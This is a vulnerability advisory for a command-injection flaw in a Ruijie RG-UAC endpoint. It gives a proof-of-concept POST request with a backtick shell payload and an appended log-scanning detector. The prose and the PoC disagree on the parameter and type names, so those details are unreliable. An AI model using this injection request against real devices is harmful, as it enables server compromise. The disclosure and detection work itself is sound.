Ruijie Network is a professional network manufacturer with a full range of network equipment products and solutions including switches, routers, software, security firewalls, wireless products, storage, etc.
Ruijie RG-UAC contains a command execution vulnerability that attackers can exploit to compromise the server.
Official site: https://www.ruijie.com.cn
Version: 1.0
Affected URL: /view/userAuthentication/SSO/commit.php
Key code (marked in the screenshot below): when the condition `$_REQUEST['type']=='adsso_log_test'` is satisfied, the value of `$_POST['ad_log_name']` is attacker-controlled and is substituted directly into `exec`, resulting in an RCE vulnerability.
PoC:

```http
POST /view/userAuthentication/SSO/commit.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Connection: close
Cookie: PHPSESSID=c545dcdb0474795f9e421b4ac6d46bc9
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

ad_name=`sleep${IFS}10`&type=adsso_test
```
![image](https://private-user-images.githubusercontent.com/171104034/338471096-9054613e-f17b-4d12-af8f-c70f97290464.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA4MjA5ODQsIm5iZiI6MTcyMDgyMDY4NCwicGF0aCI6Ii8xNzExMDQwMzQvMzM4NDcxMDk2LTkwNTQ2MTNlLWYxN2ItNGQxMi1hZjhmLWM3MGY5NzI5MDQ2NC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzEyJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcxMlQyMTQ0NDRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mYzQ4N2M0NzhhMGQ3MGM2ZjI1NWQ5OGUwODZjYzRiNDMwOGRhZmJhNTIxNDE5MjRkMDQyZGY2NGRiNTgzNzAwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.1oMkS4gr_KOiX0UCkwQ1VWx41MHMIvuNLNHYooC9yHQ)
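A defender-side check for this endpoint, added here as an example and not part of the original advisory: it reads constructed request-log records and flags POSTs to the affected path whose `ad_log_name` or `ad_name` values carry shell metacharacters (the backticks and `${IFS}` seen in the PoC body, for instance). The JSON-lines log layout and the sample records are assumptions made for the example.

```python
"""Flag command-injection attempts against the RG-UAC SSO commit endpoint in
request logs. Added example, not part of the original advisory. The log format
(one JSON object per line with method/path/body) and records are constructed."""
import json
import re
from urllib.parse import parse_qs

TARGET_PATH = "/view/userAuthentication/SSO/commit.php"
# Parameter names taken from the advisory text and its PoC request.
WATCHED_PARAMS = ("ad_log_name", "ad_name")
# Shell metacharacters that have no business in an AD server/log name:
# backticks, $(...) and ${...} expansion (covers ${IFS}), pipes, separators, redirects.
SHELL_META = re.compile(r"[`|;&<>]|\$\(|\$\{")

def inspect_request(method, path, body):
    """Return (param, decoded value) pairs that look like shell injection."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return []
    params = parse_qs(body, keep_blank_values=True)  # URL-decodes %60 -> ` etc.
    hits = []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value):
                hits.append((name, value))
    return hits

def scan_log(lines):
    """Return [(line_number, hits), ...] for every suspicious log record."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        rec = json.loads(line)
        hits = inspect_request(rec["method"], rec["path"], rec.get("body", ""))
        if hits:
            findings.append((lineno, hits))
    return findings

# Constructed sample log: a benign request, the advisory's PoC body (URL-encoded),
# a variant on the other parameter, and a GET that must not be flagged.
SAMPLE_LOG = """\
{"method": "POST", "path": "/view/userAuthentication/SSO/commit.php", "body": "ad_name=corp-dc01&type=adsso_test"}
{"method": "POST", "path": "/view/userAuthentication/SSO/commit.php", "body": "ad_name=%60sleep%24%7BIFS%7D10%60&type=adsso_test"}
{"method": "POST", "path": "/view/userAuthentication/SSO/commit.php", "body": "ad_log_name=srv01%7Ctrue&type=adsso_log_test"}
{"method": "GET", "path": "/view/userAuthentication/SSO/commit.php", "body": ""}
""".splitlines()

if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: suspicious parameters {hits}")
```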